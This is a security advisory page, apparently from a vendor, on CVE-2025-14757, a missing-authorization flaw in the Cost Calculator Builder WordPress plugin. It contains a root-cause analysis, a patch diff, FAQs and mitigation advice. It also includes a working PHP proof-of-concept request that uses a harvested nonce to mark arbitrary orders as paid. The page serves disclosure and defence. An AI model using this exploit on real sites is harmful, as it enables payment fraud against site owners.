What is CVE-2025-14757?

CVE-2025-14757 is a medium-severity vulnerability in the Cost Calculator Builder plugin for WordPress, affecting versions up to 3.6.9. It allows unauthenticated users to bypass payment status checks and mark orders as ‘completed’ without actual payment.

How does the vulnerability work?

The vulnerability arises from an AJAX action called complete_payment, which is accessible to unauthenticated users. The function only checks a nonce for verification, which can be extracted from public pages, allowing attackers to manipulate order statuses.

Who is affected by this vulnerability?

Any WordPress site using the Cost Calculator Builder plugin version 3.6.9 or earlier in conjunction with the PRO version is affected. Site administrators should check their plugin version to determine if they are at risk.

How can I check if my site is vulnerable?

To check for vulnerability, verify the installed version of the Cost Calculator Builder plugin. If it is 3.6.9 or earlier, and you are using the PRO version, your site is vulnerable.

How can I fix or mitigate this issue?

The vulnerability is patched in version 3.6.10 of the Cost Calculator Builder plugin. Administrators should update to this version immediately to eliminate the risk.

What does the CVSS score of 5.3 indicate?

A CVSS score of 5.3 is classified as medium severity, indicating that while the vulnerability poses a risk, it is not the highest priority for immediate action. However, it still requires attention due to potential financial implications.

What are the practical risks associated with this vulnerability?

Successful exploitation allows attackers to fraudulently mark orders as paid, which can lead to financial losses for businesses. This undermines the payment workflow and may result in unauthorized access to services or products.

How does the proof of concept demonstrate the issue?

The proof of concept outlines the steps an attacker can take to exploit the vulnerability, including extracting a nonce and sending a crafted POST request to change an order’s payment status. This illustrates the ease of exploitation for unauthorized users.

What is the root cause of this vulnerability?

The root cause lies in the registration of the complete_payment function via wp_ajax_nopriv, which allows unauthenticated access. The lack of user capability checks and the exposure of the nonce in the page source make it possible for attackers to exploit this endpoint.

Is there a way to temporarily mitigate the risk before updating?

While the best solution is to update to the patched version, administrators can temporarily disable the Cost Calculator Builder plugin or restrict access to the AJAX endpoint through custom code until the update is applied.

What changes were made in the patched version?

In version 3.6.10, the vulnerable complete_payment function was completely removed, eliminating the associated nonce and preventing any external calls to the order completion logic, thus closing the vulnerability.

Where can I find more information about this vulnerability?

Detailed information can be found in the official CVE database, security advisories from plugin developers, and security analysis reports from cybersecurity firms like Atomic Edge.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2025-14757: Cost Calculator Builder <= 3.6.9 – Missing Authorization to Unauthenticated Payment Status Bypass (cost-calculator-builder)

CVE ID CVE-2025-14757

Plugin cost-calculator-builder

Severity Medium (CVSS 5.3)

CWE 862

Vulnerable Version 3.6.9

Patched Version 3.6.10

Disclosed January 14, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-14757:
The Cost Calculator Builder plugin for WordPress, when used with its PRO version, contains an unauthenticated payment status bypass vulnerability. This flaw allows any site visitor to arbitrarily mark orders as ‘completed’ without payment, undermining the plugin’s financial integrity. The vulnerability stems from improper authorization on a critical AJAX endpoint.

Root Cause:
The vulnerability originates in the `CCBOrderController::complete()` function, which was registered as an AJAX handler via `wp_ajax_nopriv`. This registration made the endpoint accessible to unauthenticated users. The function, located in `/includes/classes/CCBOrderController.php`, performed only a nonce check via `check_ajax_referer(‘ccb_complete_payment’, ‘nonce’)`. It then processed an `orderId` from the POST data to update the payment status. The nonce `ccb_complete_payment` was publicly exposed in the page source within the `window.ccb_nonces` JavaScript object, rendering the check ineffective for authorization.

Exploitation:
An attacker sends a POST request to `/wp-admin/admin-ajax.php` with the `action` parameter set to `complete_payment`. The request must include a valid `nonce` parameter, which can be harvested from any public page containing a Cost Calculator Builder form. The `data` POST parameter must contain a base64-encoded JSON object with an `orderId`. For example: `data=eyJvcmRlcklkIjoiMTIzIn0=` where `123` is the target order ID. The server will then mark that order’s payment status as completed.

Patch Analysis:
The patch in version 3.6.10 completely removes the vulnerable `CCBOrderController::complete()` function. The diff shows the entire function, spanning lines 423 to 506 in the vulnerable file, was deleted. The patch also removes the corresponding nonce creation from the `install.php` file, deleting the line `’ccb_complete_payment’ => wp_create_nonce(‘ccb_complete_payment’),`. This eliminates the endpoint and its associated nonce from the application, preventing any external call to the order completion logic.

Impact:
Successful exploitation allows an unauthenticated attacker to fraudulently mark any order as paid. This can lead to financial loss for site owners who deliver goods or services based on payment status. It bypasses the entire payment workflow, potentially enabling free access to paid services, unauthorized order fulfillment, and disruption of business accounting. The vulnerability requires the PRO version of the plugin to be present and active.

Differential between vulnerable and patched code

Code Diff

--- a/cost-calculator-builder/cost-calculator-builder.php
+++ b/cost-calculator-builder/cost-calculator-builder.php
@@ -8,7 +8,7 @@
  * License: GNU General Public License v2 or later
  * License URI: http://www.gnu.org/licenses/gpl-2.0.html
  * Text Domain: cost-calculator-builder
- * Version: 3.6.9
+ * Version: 3.6.10
  */

 if ( ! defined( 'ABSPATH' ) ) {
@@ -17,9 +17,9 @@

 define( 'CALC_DIR', __DIR__ );
 define( 'CALC_FILE', __FILE__ );
-define( 'CALC_VERSION', '3.6.9' );
+define( 'CALC_VERSION', '3.6.10' );
 define( 'CALC_WP_TESTED_UP', '6.9' );
-define( 'CALC_DB_VERSION', '3.6.9' );
+define( 'CALC_DB_VERSION', '3.6.10' );
 define( 'CALC_PATH', dirname( CALC_FILE ) );
 define( 'CALC_URL', plugins_url( '', CALC_FILE ) );

--- a/cost-calculator-builder/includes/classes/CCBFrontController.php
+++ b/cost-calculator-builder/includes/classes/CCBFrontController.php
@@ -45,11 +45,12 @@
 			return '';
 		}

-		$calculators   = CCBUpdatesCallbacks::get_calculators();
-		$sticky_calc   = '';
-		$has_sticky    = false;
-		$calc_sticky   = '';
-		$sticky_banner = '';
+		$calculators    = CCBUpdatesCallbacks::get_calculators();
+		$sticky_calc    = '';
+		$has_sticky     = false;
+		$calc_sticky    = '';
+		$sticky_banner  = '';
+		$has_embed_calc = false;

 		$positions = array(
 			'top_left'      => 0,
@@ -89,7 +90,6 @@
 						}

 						wp_enqueue_style( 'ccb-sticky-css', CALC_URL . '/frontend/dist/css/sticky.css', array(), CALC_VERSION );
-						wp_enqueue_style( 'ccb-bootstrap-css', CALC_URL . '/frontend/dist/css/modal.bootstrap.css', array(), CALC_VERSION );
 						wp_enqueue_script( 'ccb-velocity-ui-js', CALC_URL . '/frontend/dist/libs/velocity.ui.min.js', array(), CALC_VERSION, true );
 						wp_enqueue_script( 'ccb-velocity-ui-js', CALC_URL . '/frontend/dist/libs/velocity.ui.min.js', array(), CALC_VERSION, true );

@@ -106,6 +106,23 @@

 					$currency = $global_settings['currency']['use_in_all'] ? $global_settings['currency'] : $calc_settings['currency'];

+					if ( isset( $post->post_content ) && has_shortcode( $post->post_content, 'stm-calc' ) ) {
+						preg_match_all(
+							'/[stm-calcs+id="(d+)"]/',
+							$post->post_content,
+							$matches
+						);
+
+						if ( ! empty( $matches[1] ) ) {
+							foreach ( $matches[1] as $shortcode_id ) {
+								if ( (int) $shortcode_id === (int) $calculator->ID ) {
+									$has_embed_calc = true;
+									break;
+								}
+							}
+						}
+					}
+
 					$sticky_settings_data = array(
 						'title'               => get_post_meta( $calculator->ID, 'stm-name', true ),
 						'calcId'              => $calculator->ID,
@@ -114,6 +131,7 @@
 						'currency'            => $currency,
 						'translations'        => CCBTranslations::get_frontend_translations(),
 						'is_pro_active'       => ccb_pro_active(),
+						'has_embed_calc'      => $has_embed_calc,
 					);

 					$GLOBALS['ccb_sticky_data'][ $calculator->ID ] = $sticky_settings_data;
--- a/cost-calculator-builder/includes/classes/CCBOrderController.php
+++ b/cost-calculator-builder/includes/classes/CCBOrderController.php
@@ -421,80 +421,6 @@
 		wp_send_json( $result );
 	}

-	public static function complete() {
-		check_ajax_referer( 'ccb_complete_payment', 'nonce' );
-
-		$result = array(
-			'status'  => 'error',
-			'success' => false,
-			'message' => __( 'Invalid data', 'cost-calculator-builder' ),
-		);
-
-		if ( empty( $_POST['data'] ) ) {
-			wp_send_json( $result );
-		}
-
-		$data = null;
-		if ( isset( $_POST['data'] ) ) {
-			$data = ccb_convert_from_btoa( $_POST['data'], true );
-		}
-
-		$order_id = ! empty( $data['orderId'] ) ? sanitize_text_field( $data['orderId'] ) : null;
-		if ( ! empty( $order_id ) ) {
-			if ( ! is_numeric( $order_id ) ) {
-				$result['message'] = __( 'Invalid order id', 'cost-calculator-builder' );
-				wp_send_json( $result );
-			}
-
-			$order = CalcOrders::get_order_full_data_by_id( $order_id );
-			if ( empty( $order ) ) {
-				$result['message'] = __( 'Order not found', 'cost-calculator-builder' );
-				wp_send_json( $result );
-			}
-
-			try {
-				$completed_status = OrdersStatuses::get_completed_status();
-				if ( $completed_status['id'] === $order['payment_status'] ) {
-					wp_send_json(
-						array(
-							'status'  => 'error',
-							'success' => false,
-							'message' => __( 'Order already completed', 'cost-calculator-builder' ),
-						)
-					);
-				}
-
-				if ( $completed_status['id'] !== $order['payment_status'] ) {
-					OrdersPayments::update_payment_status_by_order_id( $order_id, $completed_status['id'] );
-				}
-
-				wp_send_json(
-					array(
-						'status'  => 200,
-						'success' => true,
-						'message' => __( 'Order completed successfully', 'cost-calculator-builder' ),
-					)
-				);
-			} catch ( Exception $e ) {
-				wp_send_json(
-					array(
-						'status'  => 'error',
-						'success' => false,
-						'message' => $e->getMessage(),
-					)
-				);
-			}
-		}
-
-		wp_send_json(
-			array(
-				'status'  => 'error',
-				'success' => false,
-				'message' => __( 'Invalid order id', 'cost-calculator-builder' ),
-			)
-		);
-	}
-
 	public static function delete() {}

 	public static function renderWooCommercePayment() {
--- a/cost-calculator-builder/includes/classes/models/CalcOrders.php
+++ b/cost-calculator-builder/includes/classes/models/CalcOrders.php
@@ -1212,6 +1212,10 @@
 			$result[] = $calc_settings['formFields']['adminEmailAddress'];
 		}

-		return array_merge( $result, $calc_settings['formFields']['customEmailAddresses'] );
+		if ( ! empty( $calc_settings['formFields']['customEmailAddresses'] ) ) {
+			$result = array_merge( $result, $calc_settings['formFields']['customEmailAddresses'] );
+		}
+
+		return $result;
 	}
 }
--- a/cost-calculator-builder/includes/install.php
+++ b/cost-calculator-builder/includes/install.php
@@ -6,7 +6,6 @@
 		'ccb_woo_checkout'        => wp_create_nonce( 'ccb_woo_checkout' ),
 		'ccb_add_order'           => wp_create_nonce( 'ccb_add_order' ),
 		'ccb_orders'              => wp_create_nonce( 'ccb_orders' ),
-		'ccb_complete_payment'    => wp_create_nonce( 'ccb_complete_payment' ),
 		'ccb_send_invoice'        => wp_create_nonce( 'ccb_send_invoice' ),
 		'ccb_get_invoice'         => wp_create_nonce( 'ccb_get_invoice' ),
 		'ccb_wp_hook_nonce'       => wp_create_nonce( 'ccb_wp_hook_nonce' ),

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-14757 - Cost Calculator Builder <= 3.6.9 - Missing Authorization to Unauthenticated Payment Status Bypass
<?php

$target_url = 'https://vulnerable-site.example.com';

// Step 1: Fetch a public page to extract the required nonce from window.ccb_nonces.
// This script assumes you have already obtained a valid 'ccb_complete_payment' nonce.
// The nonce is typically found in the HTML source within a script tag: window.ccb_nonces.complete_payment
$nonce = 'EXTRACTED_NONCE_HERE'; // Replace with a nonce extracted from a page.
$order_id = '123'; // Replace with the target order ID.

// Step 2: Prepare the payload data.
$payload_data = json_encode(['orderId' => $order_id]);
$encoded_data = base64_encode($payload_data);

// Step 3: Craft the exploit request to the AJAX endpoint.
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/admin-ajax.php');
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, [
    'action' => 'complete_payment',
    'nonce' => $nonce,
    'data' => $encoded_data
]);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // For testing only.
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); // For testing only.

// Step 4: Execute the request and output the response.
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

echo "HTTP Code: $http_coden";
echo "Response: $responsen";

// A successful response will contain a JSON object with "success": true.
?>

Frequently Asked Questions

What is CVE-2025-14757?
Overview of the vulnerability
CVE-2025-14757 is a medium-severity vulnerability in the Cost Calculator Builder plugin for WordPress, affecting versions up to 3.6.9. It allows unauthenticated users to bypass payment status checks and mark orders as ‘completed’ without actual payment.
How does the vulnerability work?
Mechanics of exploitation
The vulnerability arises from an AJAX action called complete_payment, which is accessible to unauthenticated users. The function only checks a nonce for verification, which can be extracted from public pages, allowing attackers to manipulate order statuses.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the Cost Calculator Builder plugin version 3.6.9 or earlier in conjunction with the PRO version is affected. Site administrators should check their plugin version to determine if they are at risk.
How can I check if my site is vulnerable?
Steps for site administrators
To check for vulnerability, verify the installed version of the Cost Calculator Builder plugin. If it is 3.6.9 or earlier, and you are using the PRO version, your site is vulnerable.
How can I fix or mitigate this issue?
Recommended actions
The vulnerability is patched in version 3.6.10 of the Cost Calculator Builder plugin. Administrators should update to this version immediately to eliminate the risk.
What does the CVSS score of 5.3 indicate?
Understanding risk levels
A CVSS score of 5.3 is classified as medium severity, indicating that while the vulnerability poses a risk, it is not the highest priority for immediate action. However, it still requires attention due to potential financial implications.
What are the practical risks associated with this vulnerability?
Potential impacts on businesses
Successful exploitation allows attackers to fraudulently mark orders as paid, which can lead to financial losses for businesses. This undermines the payment workflow and may result in unauthorized access to services or products.
How does the proof of concept demonstrate the issue?
Exploit demonstration
The proof of concept outlines the steps an attacker can take to exploit the vulnerability, including extracting a nonce and sending a crafted POST request to change an order’s payment status. This illustrates the ease of exploitation for unauthorized users.
What is the root cause of this vulnerability?
Technical explanation
The root cause lies in the registration of the complete_payment function via wp_ajax_nopriv, which allows unauthenticated access. The lack of user capability checks and the exposure of the nonce in the page source make it possible for attackers to exploit this endpoint.
Is there a way to temporarily mitigate the risk before updating?
Interim measures
While the best solution is to update to the patched version, administrators can temporarily disable the Cost Calculator Builder plugin or restrict access to the AJAX endpoint through custom code until the update is applied.
What changes were made in the patched version?
Details of the fix
In version 3.6.10, the vulnerable complete_payment function was completely removed, eliminating the associated nonce and preventing any external calls to the order completion logic, thus closing the vulnerability.
Where can I find more information about this vulnerability?
Resources for further reading
Detailed information can be found in the official CVE database, security advisories from plugin developers, and security analysis reports from cybersecurity firms like Atomic Edge.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations